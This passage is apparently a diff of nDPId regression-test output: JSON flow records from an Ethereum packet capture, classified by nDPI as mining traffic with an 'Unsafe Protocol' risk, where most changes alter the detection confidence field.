+00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508364664,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1578508364632,"flow_last_seen":1578508364787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":1065,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364682,"flow_last_seen":1578508364899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508364523,"flow_last_seen":1578508364743,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365189,"flow_last_seen":1578508365331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":1435,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1578508364522,"flow_last_seen":1578508365440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":1274,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508362274,"flow_last_seen":1578508363333,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1578508365239,"flow_last_seen":1578508365961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":1758,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508365021,"flow_last_seen":1578508365192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365029,"flow_last_seen":1578508365211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365588,"flow_last_seen":1578508365744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364732,"flow_last_seen":1578508365736,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364523,"flow_last_seen":1578508364723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1218,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508365712,"flow_last_seen":1578508366123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365919,"flow_last_seen":1578508365951,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364776,"flow_last_seen":1578508365781,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1578508364382,"flow_last_seen":1578508364651,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365408,"flow_last_seen":1578508365790,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":554,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1578508364523,"flow_last_seen":1578508364687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":1846,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508365194,"flow_last_seen":1578508366069,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1578508364632,"flow_last_seen":1578508364787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":1065,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364682,"flow_last_seen":1578508364899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508364523,"flow_last_seen":1578508364743,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365189,"flow_last_seen":1578508365331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":1435,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1578508364522,"flow_last_seen":1578508365440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":1274,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508362274,"flow_last_seen":1578508363333,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1578508365239,"flow_last_seen":1578508365961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":1758,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508365021,"flow_last_seen":1578508365192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365029,"flow_last_seen":1578508365211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 